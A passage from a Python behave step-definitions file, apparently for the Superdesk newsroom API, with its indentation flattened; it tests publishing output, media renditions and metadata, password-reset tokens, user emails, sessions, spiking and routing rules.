formatted_data = json.loads(item['formatted_item'])
except Exception:
continue
associations = formatted_data.get('associations', {})
for assoc_group in associations:
if assoc_group.startswith(group) and associations[assoc_group].get('guid', '') == value:
return
assert False
@then('we get "{value}" as "{group}" story for subscriber "{sub}" in package "{pck}"')
def step_impl_then_get_formatted_output_pck(context, value, group, sub, pck):
assert_200(context.response)
value = apply_placeholders(context, value)
data = get_json_data(context.response)
for item in data['_items']:
if item['item_id'] != pck:
continue
if item['subscriber_id'] != sub:
continue
try:
formatted_data = json.loads(item['formatted_item'])
except Exception:
continue
associations = formatted_data.get('associations', {})
for assoc_group in associations:
if assoc_group.startswith(group) and associations[assoc_group].get('guid', '') == value:
return
assert False
@then('we get "{value}" as "{group}" story for subscriber "{sub}" not in package "{pck}" version "{v}"')
def step_impl_then_get_formatted_output_pck_version(context, value, group, sub, pck, v):
assert_200(context.response)
value = apply_placeholders(context, value)
data = get_json_data(context.response)
for item in data['_items']:
if item['item_id'] == pck:
if item['subscriber_id'] == sub and str(item['item_version']) == v:
try:
formatted_data = json.loads(item['formatted_item'])
except Exception:
continue
associations = formatted_data.get('associations', {})
for assoc_group in associations:
if assoc_group.startswith(group) \
and associations[assoc_group].get('guid', '') == value:
assert False
assert True
return
assert False
@then('we get "{value}" in formatted output as "{group}" newsml12 story')
def step_impl_then_get_formatted_output_newsml(context, value, group):
assert_200(context.response)
value = apply_placeholders(context, value)
data = get_json_data(context.response)
for item in data['_items']:
if '<' + group + '>' + value + '</' + group + '>' in item['formatted_item']:
return
assert False
@then('we get no "{field}"')
def step_impl_then_get_nofield(context, field):
assert_200(context.response)
expect_json_not_contains(context.response, field)
@then('expect json in "{path}"')
def step_impl_then_get_nofield_in_path(context, path):
assert_200(context.response)
expect_json(context.response, context.text, path)
@then('we get existing resource')
def step_impl_then_get_existing(context):
assert_200(context.response)
test_json(context)
@then('we get existing saved search')
def step_impl_then_get_existing_saved_search(context):
assert_200(context.response)
test_json_with_string_field_value(context, 'filter')
@then('we get OK response')
def step_impl_then_get_ok(context):
assert_200(context.response)
@then('we get response code {code}')
def step_impl_then_get_code(context, code):
expect_status(context.response, int(code))
@then('we get updated response')
def step_impl_then_get_updated(context):
assert_ok(context.response)
if context.text:
test_json(context)
@then('we get "{key}" in "{url}"')
def step_impl_then_get_key_in_url(context, key, url):
url = apply_placeholders(context, url)
res = context.client.get(get_prefixed_url(context.app, url), headers=context.headers)
assert_200(res)
expect_json_contains(res, key)
@then('we get file metadata')
def step_impl_then_get_file_meta(context):
assert len(
json.loads(apply_path(
parse_json_response(context.response),
'filemeta_json'
)).items()
) > 0
'expected non empty metadata dictionary'
@then('we get "{filename}" metadata')
def step_impl_then_get_given_file_meta(context, filename):
if filename == 'bike.jpg':
metadata = {
'ycbcrpositioning': 1,
'imagelength': 2448,
'exifimagewidth': 2448,
'meteringmode': 2,
'datetimedigitized': '2013:08:01 16:19:28',
'exposuremode': 0,
'flashpixversion': '0100',
'isospeedratings': 80,
'length': 469900,
'imageuniqueid': 'f3533c05daef2debe6257fd99e058eec',
'datetimeoriginal': '2013:08:01 16:19:28',
'whitebalance': 0,
'exposureprogram': 3,
'colorspace': 1,
'exifimageheight': 3264,
'software': 'Google',
'resolutionunit': 2,
'make': 'SAMSUNG',
'maxaperturevalue': [276, 100],
'aperturevalue': [276, 100],
'scenecapturetype': 0,
'exposuretime': [1, 2004],
'datetime': '2013:08:01 16:19:28',
'exifoffset': 216,
'yresolution': [72, 1],
'orientation': 1,
'componentsconfiguration': '0000',
'exifversion': '0220',
'focallength': [37, 10],
'flash': 0,
'model': 'GT-I9300',
'xresolution': [72, 1],
'fnumber': [26, 10],
'imagewidth': 3264,
'brightnessvalue': [2362, 256],
'exposurebiasvalue': [0, 10],
'shutterspeedvalue': [2808, 256]
}
elif filename == 'green.ogg':
metadata = {
'producer': 'Lavf54.59.103',
'music_genre': 'New Age',
'sample_rate': '44100',
'artist': 'Maxime Abbey',
'length': 368058,
'bit_rate': '160000',
'title': 'Green Hills',
'mime_type': 'audio/vorbis',
'format_version': 'Vorbis version 0',
'compression': 'Vorbis',
'duration': '0:00:20.088163',
'endian': 'Little endian',
'nb_channel': '2'
}
elif filename == 'this_week_nasa.mp4':
metadata = {
'mime_type': 'video/mp4',
'creation_date': '1904-01-01T00:00:00+00:00',
'duration': '0:00:10.224000',
'width': '480',
'length': 877869,
'comment': 'User volume: 100.0%',
'height': '270',
'endian': 'Big endian',
'last_modification': '1904-01-01T00:00:00+00:00'
}
else:
raise NotImplementedError("No metadata for file '{}'.".format(filename))
assertions.maxDiff = None
data = json.loads(context.response.get_data())
filemeta = get_filemeta(data)
json_match(filemeta, metadata)
@then('we get "{type}" renditions')
def step_impl_then_get_renditions(context, type):
expect_json_contains(context.response, 'renditions')
renditions = apply_path(parse_json_response(context.response), 'renditions')
assert isinstance(renditions, dict), 'expected dict for image renditions'
for rend_name in context.app.config['RENDITIONS'][type]:
desc = renditions[rend_name]
assert isinstance(desc, dict), 'expected dict for rendition description'
assert 'href' in desc, 'expected href in rendition description'
assert 'media' in desc, 'expected media identifier in rendition description'
we_can_fetch_a_file(context, desc['href'], 'image/jpeg')
@then('we get "{crop_name}" in renditions')
def step_impl_then_get_renditions(context, crop_name):
expect_json_contains(context.response, 'renditions')
renditions = apply_path(parse_json_response(context.response), 'renditions')
assert isinstance(renditions, dict), 'expected dict for image renditions'
desc = renditions[crop_name]
assert isinstance(desc, dict), 'expected dict for rendition description'
assert 'href' in desc, 'expected href in rendition description'
assert 'media' in desc, 'expected media identifier in rendition description'
we_can_fetch_a_file(context, desc['href'], 'image/jpeg')
@then('we get "{crop_name}" not in renditions')
def step_impl_then_get_renditions(context, crop_name):
expect_json_contains(context.response, 'renditions')
renditions = apply_path(parse_json_response(context.response), 'renditions')
assert isinstance(renditions, dict), 'expected dict for image renditions'
assert crop_name not in renditions, 'expected crop not in renditions'
@then('item "{item_id}" is unlocked')
def then_item_is_unlocked(context, item_id):
assert_200(context.response)
data = json.loads(context.response.get_data())
assert data.get('lock_user', None) is None, 'item is locked by user #{0}'.format(data.get('lock_user'))
@then('item "{item_id}" is locked')
def then_item_is_locked(context, item_id):
assert_200(context.response)
resp = parse_json_response(context.response)
assert resp['lock_user'] is not None
@then('item "{item_id}" is assigned')
def then_item_is_assigned(context, item_id):
resp = parse_json_response(context.response)
assert resp['task'].get('user', None) is not None, 'item is not assigned'
@then('we get rendition "{name}" with mimetype "{mimetype}"')
def step_impl_then_get_rendition_with_mimetype(context, name, mimetype):
expect_json_contains(context.response, 'renditions')
renditions = apply_path(parse_json_response(context.response), 'renditions')
assert isinstance(renditions, dict), 'expected dict for image renditions'
desc = renditions[name]
assert isinstance(desc, dict), 'expected dict for rendition description'
assert 'href' in desc, 'expected href in rendition description'
we_can_fetch_a_file(context, desc['href'], mimetype)
set_placeholder(context, "rendition.{}.href".format(name), desc['href'])
@when('we get updated media from archive')
def get_updated_media_from_archive(context):
url = 'archive/%s' % context._id
when_we_get_url(context, url)
assert_200(context.response)
@then('baseImage rendition is updated')
def check_base_image_rendition(context):
check_rendition(context, 'baseImage')
@then('original rendition is updated with link to file having mimetype "{mimetype}"')
def check_original_rendition(context, mimetype):
rv = parse_json_response(context.response)
link_to_file = rv['renditions']['original']['href']
assert link_to_file
we_can_fetch_a_file(context, link_to_file, mimetype)
@then('thumbnail rendition is updated')
def check_thumbnail_rendition(context):
check_rendition(context, 'thumbnail')
def check_rendition(context, rendition_name):
rv = parse_json_response(context.response)
assert rv['renditions'][rendition_name] != context.renditions[rendition_name], rv['renditions']
@then('we get "{key}"')
def step_impl_then_get_key(context, key):
assert_200(context.response)
expect_json_contains(context.response, key)
item = json.loads(context.response.get_data())
set_placeholder(context, '%s' % key, item[key])
@then('we store "{key}" with value "{value}" to context')
def step_impl_then_we_store_key_value_to_context(context, key, value):
set_placeholder(context, key, apply_placeholders(context, value))
@then('we get action in user activity')
def step_impl_then_get_action(context):
response = context.client.get(get_prefixed_url(context.app, '/activity'), headers=context.headers)
expect_json_contains(response, '_items')
@then('we get a file reference')
def step_impl_then_get_file(context):
assert_200(context.response)
expect_json_contains(context.response, 'renditions')
data = get_json_data(context.response)
url = '/upload/%s' % data['_id']
headers = [('Accept', 'application/json')]
headers = unique_headers(headers, context.headers)
response = context.client.get(get_prefixed_url(context.app, url), headers=headers)
assert_200(response)
assert len(response.get_data()), response
assert response.mimetype == 'application/json', response.mimetype
expect_json_contains(response, 'renditions')
expect_json_contains(response, {'mimetype': 'image/jpeg'})
fetched_data = get_json_data(context.response)
context.fetched_data = fetched_data
@then('we get cropped data smaller than "{max_size}"')
def step_impl_then_get_cropped_file(context, max_size):
assert int(get_filemeta(context.fetched_data, 'length')) < int(max_size), 'was expecting smaller image'
@then('we can fetch a data_uri')
def step_impl_we_fetch_data_uri(context):
we_can_fetch_a_file(context, context.fetched_data['renditions']['original']['href'], 'image/jpeg')
@then('we fetch a file "{url}"')
def step_impl_we_cannot_fetch_file(context, url):
url = apply_placeholders(context, url)
headers = [('Accept', 'application/json')]
headers = unique_headers(headers, context.headers)
context.response = context.client.get(get_prefixed_url(context.app, url), headers=headers)
def we_can_fetch_a_file(context, url, mimetype):
headers = [('Accept', 'application/json')]
headers = unique_headers(headers, context.headers)
response = context.client.get(get_prefixed_url(context.app, url), headers=headers)
assert_200(response)
assert len(response.get_data()), response
assert response.mimetype == mimetype, response.mimetype
@then('we can delete that file')
def step_impl_we_delete_file(context):
url = '/upload/%s' % context.fetched_data['_id']
context.headers.append(('Accept', 'application/json'))
headers = if_match(context, context.fetched_data.get('_etag'))
response = context.client.delete(get_prefixed_url(context.app, url), headers=headers)
assert_200(response)
response = context.client.get(get_prefixed_url(context.app, url), headers=headers)
assert_404(response)
@then('we get a picture url')
def step_impl_then_get_picture(context):
assert_ok(context.response)
expect_json_contains(context.response, 'picture_url')
@then('we get aggregations "{keys}"')
def step_impl_then_get_aggs(context, keys):
assert_200(context.response)
expect_json_contains(context.response, '_aggregations')
data = get_json_data(context.response)
aggs = data['_aggregations']
for key in keys.split(','):
assert_in(key, aggs)
@then('the file is stored localy')
def step_impl_then_file(context):
assert_200(context.response)
folder = context.app.config['UPLOAD_FOLDER']
assert os.path.exists(os.path.join(folder, context.filename))
@then('we get version {version}')
def step_impl_then_get_version(context, version):
assert_200(context.response)
expect_json_contains(context.response, {'_current_version': int(version)})
@then('the field "{field}" value is "{value}"')
def step_impl_then_get_field_value(context, field, value):
assert_200(context.response)
expect_json_contains(context.response, {field: value})
@then('we get etag matching "{url}"')
def step_impl_then_get_etag(context, url):
if context.app.config['IF_MATCH']:
assert_200(context.response)
expect_json_contains(context.response, '_etag')
etag = get_json_data(context.response).get('_etag')
response = context.client.get(get_prefixed_url(context.app, url), headers=context.headers)
expect_json_contains(response, {'_etag': etag})
@then('we get not modified response')
def step_impl_then_not_modified(context):
expect_status(context.response, 304)
@then('we get "{header}" header')
def step_impl_then_get_header(context, header):
expect_headers_contain(context.response, header)
@then('we get "{header}" header with "{type}" type')
def step_impl_then_get_header_with_type(context, header, type):
expect_headers_contain(context.response, header, type)
@then('we get link to "{resource}"')
def then_we_get_link_to_resource(context, resource):
doc = get_json_data(context.response)
self_link = doc.get('_links').get('self')
assert resource in self_link['href'], 'expect link to "%s", got %s' % (resource, self_link)
@then('we get deleted response')
def then_we_get_deleted_response(context):
assert_200(context.response)
@when('we post to reset_password we get email with token')
def we_post_to_reset_password(context):
data = {'email': '[email protected]'}
headers = [('Content-Type', 'multipart/form-data')]
headers = unique_headers(headers, context.headers)
with context.app.mail.record_messages() as outbox:
context.response = context.client.post(get_prefixed_url(context.app, '/reset_user_password'),
data=data, headers=headers)
expect_status_in(context.response, (200, 201))
assert len(outbox) == 1
assert outbox[0].subject == "Reset password"
email_text = outbox[0].body
assert "24" in email_text
words = email_text.split()
url = urlparse(words[words.index("link") + 1])
token = url.fragment.split('token=')[-1]
assert token
context.token = token
@then('we can check if token is valid')
def we_can_check_token_is_valid(context):
data = {'token': context.token}
headers = [('Content-Type', 'multipart/form-data')]
headers = unique_headers(headers, context.headers)
context.response = context.client.post(get_prefixed_url(context.app, '/reset_user_password'),
data=data, headers=headers)
expect_status_in(context.response, (200, 201))
@then('we update token to be expired')
def we_update_token_to_expired(context):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
expiry = utc.utcnow() - timedelta(days=2)
reset_request = get_resource_service('reset_user_password').find_one(req=None, token=context.token)
reset_request['expire_time'] = expiry
id = reset_request.pop('_id')
get_resource_service('reset_user_password').patch(id, reset_request)
@then('token is invalid')
def check_token_invalid(context):
data = {'token': context.token}
headers = [('Content-Type', 'multipart/form-data')]
headers = unique_headers(headers, context.headers)
context.response = context.client.post(get_prefixed_url(context.app, '/reset_user_password'),
data=data, headers=headers)
expect_status_in(context.response, (403, 401))
@when('we post to reset_password we do not get email with token')
def we_post_to_reset_password_it_fails(context):
data = {'email': '[email protected]'}
headers = [('Content-Type', 'multipart/form-data')]
headers = unique_headers(headers, context.headers)
with context.app.mail.record_messages() as outbox:
context.response = context.client.post(get_prefixed_url(context.app, '/reset_user_password'),
data=data, headers=headers)
expect_status_in(context.response, (200, 201))
assert len(outbox) == 0
def start_reset_password_for_user(context):
data = {'token': context.token, 'password': 'test_pass'}
headers = [('Content-Type', 'multipart/form-data')]
headers = unique_headers(headers, context.headers)
context.response = context.client.post(get_prefixed_url(context.app, '/reset_user_password'),
data=data, headers=headers)
@then('we fail to reset password for user')
def we_fail_to_reset_password_for_user(context):
start_reset_password_for_user(context)
step_impl_then_get_error(context, 403)
@then('we reset password for user')
def we_reset_password_for_user(context):
start_reset_password_for_user(context)
expect_status_in(context.response, (200, 201))
auth_data = {'username': 'foo', 'password': 'test_pass'}
headers = [('Content-Type', 'multipart/form-data')]
headers = unique_headers(headers, context.headers)
context.response = context.client.post(get_prefixed_url(context.app, '/auth_db'), data=auth_data, headers=headers)
expect_status_in(context.response, (200, 201))
@when('we switch user')
def when_we_switch_user(context):
user = {'username': 'test-user-2', 'password': 'pwd', 'is_active': True,
'needs_activation': False, 'sign_off': 'foo'}
tests.setup_auth_user(context, user)
set_placeholder(context, 'USERS_ID', str(context.user['_id']))
@when('we setup test user')
def when_we_setup_test_user(context):
tests.setup_auth_user(context, tests.test_user)
@when('we get my "{url}"')
def when_we_get_my_url(context, url):
user_id = str(context.user.get('_id'))
my_url = '{0}?where={1}'.format(url, json.dumps({'user': user_id}))
return when_we_get_url(context, my_url)
@when('we get user "{resource}"')
def when_we_get_user_resource(context, resource):
url = '/users/{0}/{1}'.format(str(context.user.get('_id')), resource)
return when_we_get_url(context, url)
@then('we get embedded items')
def we_get_embedded_items(context):
response_data = json.loads(context.response.get_data())
href = get_self_href(response_data, context)
url = href + '/?embedded={"items": 1}'
context.response = context.client.get(get_prefixed_url(context.app, url), headers=context.headers)
assert_200(context.response)
context.response_data = json.loads(context.response.get_data())
assert len(context.response_data['items']['view_items']) == 2
@when('we reset notifications')
def step_when_we_reset_notifications(context):
context.app.notification_client.reset()
@then('we get notifications')
def then_we_get_notifications(context):
assert hasattr(context.app.notification_client, 'messages'), 'no messages'
notifications = context.app.notification_client.messages
notifications_data = [json.loads(notification) for notification in notifications]
context_data = json.loads(apply_placeholders(context, context.text))
assert_equal(json_match(context_data, notifications_data), True,
msg=str(context_data) + '\n != \n' + str(notifications_data))
@then('we get default preferences')
def get_default_prefs(context):
response_data = json.loads(context.response.get_data())
assert_equal(response_data['user_preferences'], default_user_preferences)
@when('we spike "{item_id}"')
def step_impl_when_spike_url(context, item_id):
item_id = apply_placeholders(context, item_id)
res = get_res('/archive/' + item_id, context)
headers = if_match(context, res.get('_etag'))
context.response = context.client.patch(get_prefixed_url(context.app, '/archive/spike/' + item_id),
data='{"state": "spiked"}', headers=headers)
@when('we spike fetched item')
def step_impl_when_spike_fetched_item(context):
data = json.loads(apply_placeholders(context, context.text))
item_id = data["_id"]
res = get_res('/archive/' + item_id, context)
headers = if_match(context, res.get('_etag'))
context.response = context.client.patch(get_prefixed_url(context.app, '/archive/spike/' + item_id),
data='{"state": "spiked"}', headers=headers)
@when('we unspike "{item_id}"')
def step_impl_when_unspike_url(context, item_id):
item_id = apply_placeholders(context, item_id)
res = get_res('/archive/' + item_id, context)
headers = if_match(context, res.get('_etag'))
context.response = context.client.patch(get_prefixed_url(context.app, '/archive/unspike/' + item_id),
data=apply_placeholders(context, context.text or '{}'), headers=headers)
@then('we get spiked content "{item_id}"')
def get_spiked_content(context, item_id):
item_id = apply_placeholders(context, item_id)
url = 'archive/{0}'.format(item_id)
when_we_get_url(context, url)
assert_200(context.response)
response_data = json.loads(context.response.get_data())
assert_equal(response_data['state'], 'spiked')
assert_equal(response_data['operation'], 'spike')
@then('we get unspiked content "{id}"')
def get_unspiked_content(context, id):
text = context.text
context.text = ''
url = 'archive/{0}'.format(id)
when_we_get_url(context, url)
assert_200(context.response)
response_data = json.loads(context.response.get_data())
assert_equal(response_data['state'], 'draft')
assert_equal(response_data['operation'], 'unspike')
# Tolga Akin (05/11/14)
# Expiry value doesn't get set to None properly in Elastic.
# Discussed with Petr so we'll look into this later
# assert_equal(response_data['expiry'], None)
if text:
assert json_match(json.loads(apply_placeholders(context, text)), response_data)
@then('we get global content expiry')
def get_global_content_expiry(context):
validate_expired_content(context, context.app.config['CONTENT_EXPIRY_MINUTES'], utcnow())
@then('we get content expiry {minutes}')
def get_content_expiry(context, minutes):
validate_expired_content(context, minutes, utcnow())
@then('we get expiry for schedule and embargo content {minutes} minutes after "{future_date}"')
def get_content_expiry_schedule(context, minutes, future_date):
future_date = parse_date(apply_placeholders(context, future_date))
validate_expired_content(context, minutes, future_date)
@then('we get desk spike expiry after "{test_minutes}"')
def get_desk_spike_expiry(context, test_minutes):
validate_expired_content(context, test_minutes, utcnow())
def validate_expired_content(context, minutes, start_datetime):
response_data = json.loads(context.response.get_data())
assert response_data['expiry']
response_expiry = parse_date(response_data['expiry'])
expiry = start_datetime + timedelta(minutes=int(minutes))
assert response_expiry <= expiry
@when('we mention user in comment for "{url}"')
def we_mention_user_in_comment(context, url):
with context.app.mail.record_messages() as outbox:
step_impl_when_post_url(context, url)
assert len(outbox) == 1
assert_equal(outbox[0].subject, "You were mentioned in a comment by test_user")
email_text = outbox[0].body
assert email_text
@when('we change user status to "{status}" using "{url}"')
def we_change_user_status(context, status, url):
with context.app.mail.record_messages() as outbox:
step_impl_when_patch_url(context, url)
assert len(outbox) == 1
assert_equal(outbox[0].subject, "Your Superdesk account is " + status)
assert outbox[0].body
@when('we get the default incoming stage')
def we_get_default_incoming_stage(context):
data = json.loads(context.response.get_data())
incoming_stage = data['_items'][0]['incoming_stage'] if '_items' in data else data['incoming_stage']
assert incoming_stage
url = 'stages/{0}'.format(incoming_stage)
when_we_get_url(context, url)
assert_200(context.response)
data = json.loads(context.response.get_data())
assert data['default_incoming'] is True
assert data['name'] == 'Incoming Stage'
@then('we get stage filled in to default_incoming')
def we_get_stage_filled_in(context):
data = json.loads(context.response.get_data())
assert data['task']['stage']
@given('we have sessions "{url}"')
def we_have_sessions_get_id(context, url):
when_we_get_url(context, url)
item = json.loads(context.response.get_data())
context.session_id = item['_items'][0]['_id']
context.data = item
set_placeholder(context, 'SESSION_ID', item['_items'][0]['_id'])
setattr(context, 'users', item['_items'][0]['user'])
@then('we get session by id')
def we_get_session_by_id(context):
url = 'sessions/' + context.session_id
when_we_get_url(context, url)
item = json.loads(context.response.get_data())
returned_id = item["_id"]
assert context.session_id == returned_id
@then('we delete session by id')
def we_delete_session_by_id(context):
url = 'sessions/' + context.session_id
step_impl_when_delete_url(context, url)
assert_200(context.response)
@when('we create a new user')
def step_create_a_user(context):
data = apply_placeholders(context, context.text)
with context.app.mail.record_messages() as outbox:
context.response = context.client.post(get_prefixed_url(context.app, '/users'),
data=data, headers=context.headers)
expect_status_in(context.response, (200, 201))
assert len(outbox) == 1
context.email = outbox[0]
@then('we get activation email')
def step_get_activation_email(context):
assert context.email.subject == 'Superdesk account created'
email_text = context.email.body
words = email_text.split()
url = urlparse(words[words.index("to") + 1])
token = url.fragment.split('token=')[-1]
assert token
@then('we set elastic limit')
def step_set_limit(context):
context.app.settings['MAX_SEARCH_DEPTH'] = 1
@then('we get emails')
def step_we_get_email(context):
data = json.loads(context.text)
for email in data:
assert check_if_email_sent(context, email)
@then('we get {count} emails')
def step_we_get_no_email(context, count):
assert len(context.outbox) == int(count)
if context.text:
step_we_get_email(context)
def check_if_email_sent(context, spec):
if context.outbox:
for key in spec:
found = False
values = [getattr(email, key) for email in context.outbox]
for value in values:
if spec[key] in value:
found = True
if not found:
print('%s:%s not found in %s' % (key, spec[key], json.dumps(values, indent=2)))
return False
return True
print('no email sent')
return False
@then('we get activity')
def then_we_get_activity(context):
url = apply_placeholders(context, '/activity?where={"name": {"$in": ["notify", "user:mention" , "desk:mention"]}}')
context.response = context.client.get(get_prefixed_url(context.app, url), headers=context.headers)
if context.response.status_code == 200:
expect_json_length(context.response, 1, path='_items')
item = json.loads(context.response.get_data())
item = item['_items'][0]
if item.get('_id'):
setattr(context, 'activity', item)
set_placeholder(context, 'USERS_ID', item['user'])
def login_as(context, username, password, user_type):
user = {'username': username, 'password': password, 'is_active': True,
'is_enabled': True, 'needs_activation': False, user_type: user_type}
if context.text:
user.update(json.loads(context.text))
tests.setup_auth_user(context, user)
@given('we login as user "{username}" with password "{password}" and user type "{user_type}"')
def given_we_login_as_user(context, username, password, user_type):
login_as(context, username, password, user_type)
@when('we login as user "{username}" with password "{password}" and user type "{user_type}"')
def when_we_login_as_user(context, username, password, user_type):
login_as(context, username, password, user_type)
def is_user_resource(resource):
return resource in ('users', '/users')
@then('we get {no_of_stages} invisible stages')
def when_we_get_invisible_stages(context, no_of_stages):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
stages = get_resource_service('stages').get_stages_by_visibility(is_visible=False)
assert len(stages) == int(no_of_stages)
@then('we get {no_of_stages} visible stages')
def when_we_get_visible_stages(context, no_of_stages):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
stages = get_resource_service('stages').get_stages_by_visibility(is_visible=True)
assert len(stages) == int(no_of_stages)
@then('we get {no_of_stages} invisible stages for user')
def when_we_get_invisible_stages_for_user(context, no_of_stages):
data = json.loads(apply_placeholders(context, context.text))
with context.app.test_request_context(context.app.config['URL_PREFIX']):
stages = get_resource_service('users').get_invisible_stages(data['user'])
assert len(stages) == int(no_of_stages)
@then('we get "{field_name}" populated')
def then_field_is_populated(context, field_name):
resp = parse_json_response(context.response)
assert resp[field_name].get('user', None) is not None, 'item is not populated'
@then('we get "{field_name}" not populated')
def then_field_is_not_populated(context, field_name):
resp = parse_json_response(context.response)
assert resp[field_name] is None, 'item is not populated'
@then('the field "{field_name}" value is not "{field_value}"')
def then_field_value_is_not_same(context, field_name, field_value):
resp = parse_json_response(context.response)
assert resp[field_name] != field_value, 'values are the same'
@then('we get "{field_name}" not populated in results')
def then_field_is_not_populated_in_results(context, field_name):
resps = parse_json_response(context.response)
for resp in resps['_items']:
assert resp[field_name] is None, 'item is not populated'
@when('we delete content filter "{name}"')
def step_delete_content_filter(context, name):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
filter = get_resource_service('content_filters').find_one(req=None, name=name)
url = '/content_filters/{}'.format(filter['_id'])
headers = if_match(context, filter.get('_etag'))
context.response = context.client.delete(get_prefixed_url(context.app, url), headers=headers)
@when('we rewrite "{item_id}"')
def step_impl_when_rewrite(context, item_id):
context_data = {}
_id = apply_placeholders(context, item_id)
if context.text:
context_data.update(json.loads(apply_placeholders(context, context.text)))
data = json.dumps(context_data)
context.response = context.client.post(
get_prefixed_url(context.app, '/archive/{}/rewrite'.format(_id)),
data=data, headers=context.headers)
if context.response.status_code == 400:
return
resp = parse_json_response(context.response)
set_placeholder(context, 'REWRITE_OF', _id)
set_placeholder(context, 'REWRITE_ID', resp['_id'])
@then('we get "{field_name}" does not exist')
def then_field_is_not_populated_in_results(context, field_name):
resps = parse_json_response(context.response)
if '_items' in resps:
for resp in resps['_items']:
assert field_name not in resp, 'field exists'
else:
assert field_name not in resps, 'field exists'
@then('we get "{field_name}" does exist')
def then_field_is_not_populated_in_results(context, field_name):
resps = parse_json_response(context.response)
for resp in resps['_items']:
assert field_name in resp, 'field does not exist'
@when('we publish "{item_id}" with "{pub_type}" type and "{state}" state')
def step_impl_when_publish_url(context, item_id, pub_type, state):
item_id = apply_placeholders(context, item_id)
res = get_res('/archive/' + item_id, context)
headers = if_match(context, res.get('_etag'))
context_data = {"state": state}
if context.text:
data = apply_placeholders(context, context.text)
context_data.update(json.loads(data))
data = json.dumps(context_data)
context.response = context.client.patch(get_prefixed_url(context.app, '/archive/{}/{}'.format(pub_type, item_id)),
data=data, headers=headers)
store_placeholder(context, 'archive_{}'.format(pub_type))
@then('the ingest item is routed based on routing scheme and rule "{rule_name}"')
def then_ingest_item_is_routed_based_on_routing_scheme(context, rule_name):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
validate_routed_item(context, rule_name, True)
@then('the ingest item is routed and transformed based on routing scheme and rule "{rule_name}"')
def then_ingest_item_is_routed_transformed_based_on_routing_scheme(context, rule_name):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
validate_routed_item(context, rule_name, True, True)
@then('the ingest item is not routed based on routing scheme and rule "{rule_name}"')
def then_ingest_item_is_not_routed_based_on_routing_scheme(context, rule_name):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
validate_routed_item(context, rule_name, False)
def validate_routed_item(context, rule_name, is_routed, is_transformed=False):
data = json.loads(apply_placeholders(context, context.text))
def validate_rule(action, state):
for destination in rule.get('actions', {}).get(action, []):
query = {
'and': [
{'term': {'ingest_id': str(data['ingest'])}},
{'term': {'task.desk': str(destination['desk'])}},
{'term': {'task.stage': str(destination['stage'])}},
{'term': {'state': state}}
]
}
item = get_archive_items(query) + get_published_items(query)
if is_routed:
assert len(item) > 0, 'No routed items found for criteria: ' + str(query)
assert item[0]['ingest_id'] == data['ingest']
assert item[0]['task']['desk'] == str(destination['desk'])
assert item[0]['task']['stage'] == str(destination['stage'])
assert item[0]['state'] == state
if is_transformed:
assert item[0]['abstract'] == 'Abstract has been updated'
assert_items_in_package(item[0], state, str(destination['desk']), str(destination['stage']))
else:
assert len(item) == 0
scheme = get_resource_service('routing_schemes').find_one(_id=data['routing_scheme'], req=None)
rule = next((rule for rule in scheme['rules'] if rule['name'].lower() == rule_name.lower()), {})
validate_rule('fetch', 'routed')
validate_rule('publish', 'published')
@when('we schedule the routing scheme "{scheme_id}"')
def when_we_schedule_the_routing_scheme(context, scheme_id):
with context.app.test_request_context(context.app.config['URL_PREFIX']):
scheme_id = apply_placeholders(context, scheme_id)
url = apply_placeholders(context, 'routing_schemes/%s' % scheme_id)
res = get_res(url, context)
href = get_self_href(res, context)
headers = if_match(context, res.get('_etag'))
rule = res.get('rules')[0]
now = utcnow()
from apps.rules.routing_rules import Weekdays
rule['schedule'] = {
'day_of_week': [
Weekdays.dayname(now + timedelta(days=1)),
Weekdays.dayname(now + timedelta(days=2))
],
'hour_of_day_from': '16:00:00',
'hour_of_day_to': '20:00:00'
}
if len(res.get('rules')) > 1:
rule = res.get('rules')[1]
rule['schedule'] = {
'day_of_week': [Weekdays.dayname(now)]
}
context.response = context.client.patch(get_prefixed_url(context.app, href),
data=json.dumps({'rules': res.get('rules', [])}),
headers=headers)
assert_200(context.response)
def get_archive_items(query):
req = ParsedRequest()
req.max_results = 100
req.args = {'filter': json.dumps(query)}
return list(get_resource_service('archive').get(lookup=None, req=req))
def get_published_items(query):
req = ParsedRequest()
req.max_results = 100
req.args = {'filter': json.dumps(query)}
return list(get_resource_service('published').get(lookup=None, req=req))
def assert_items_in_package(item, state, desk, stage):
if item.get('groups'):
terms = [{'term': {'_id': ref.get('residRef')}}
for ref in [ref for group in item.get('groups', [])
for ref in group.get('refs', []) if 'residRef' in ref]]
query = {'or': terms}
items = get_archive_items(query)
assert len(items) == len(terms)
for item in items:
assert item.get('state') == state
assert item.get('task', {}).get('desk') == desk
assert item.get('task', {}).get('stage') == stage
@given('I logout')
def logout(context):
we_have_sessions_get_id(context, '/sessions')
step_impl_when_delete_url(context, '/auth_db/{}'.format(context.session_id))
assert_200(context.response)
@then('we get "{url}" and match')
def we_get_and_match(context, url):
url = apply_placeholders(context, url)
response_data = get_res(url, context)
context_data = json.loads(apply_placeholders(context, context.text))
assert_equal(json_match(context_data, response_data), True,
msg=str(context_data) + '\n != \n' + str(response_data))
@then('there is no "{key}" in response')
def there_is_no_key_in_response(context, key):
data = get_json_data(context.response)
assert key not in data, 'key "%s" is in %s' % (key, data)
@then('there is no "{key}" in task')
def there_is_no_key_in_preferences(context, key):
data = get_json_data(context.response)['task']
assert key not in data, 'key "%s" is in task' % key
@then('there is no "{key}" in data')
def there_is_no_profile_in_data(context, key):
data = get_json_data(context.response)['_items'][0]['data']
assert key not in data, 'key "%s" is in data' % key
@then('broadcast "{key}" has value "{value}"')
def broadcast_key_has_value(context, key, value):
data = get_json_data(context.response).get('broadcast', {})
value = apply_placeholders(context, value)
if value.lower() == 'none':
assert data[key] is None, 'key "%s" is not none and has value "%s"' % (key, data[key])
else:
assert data[key] == value, 'key "%s" does not have valid value "%s"' % (key, data[key])
@then('there is no "{key}" preference')
def there_is_no_preference(context, key):
data = get_json_data(context.response)
assert key not in data['user_preferences'], '%s is in %s' % (key, data['user_preferences'].keys())
@then('there is no "{key}" in "{namespace}" preferences')
def there_is_no_key_in_namespace_preferences(context, key, namespace):
data = get_json_data(context.response)['user_preferences']
assert key not in data[namespace], 'key "%s" is in %s' % (key, data[namespace])
@then('we check if article has Embargo')
